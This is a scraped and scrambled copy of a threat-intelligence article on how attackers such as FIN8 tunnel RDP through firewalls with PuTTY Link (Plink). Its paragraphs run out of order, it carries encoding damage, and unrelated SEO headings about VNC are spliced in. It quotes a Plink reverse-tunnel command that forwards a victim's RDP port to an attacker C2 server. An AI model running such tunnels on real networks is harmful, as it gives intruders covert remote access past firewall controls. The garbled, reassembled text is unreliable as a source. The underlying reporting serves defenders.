It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility. Figure 2: Example of successful RDP tunnel created using Plink Figure 3: Example of successful port forwarding from the attacker C2 server to the victim Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.Įxample Plink Executable -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389įigure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example Inbound RDP TunnelingĪ common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1. Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.
VNC CONNECT THROUGH FIREWALL WINDOWS
As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments. Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. When malware is removed from the equation, intrusions become increasingly difficult to detect.
When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees.
VNC CONNECT THROUGH FIREWALL FREE
Create a Free Mandiant Advantage Account.
0 kommentar(er)
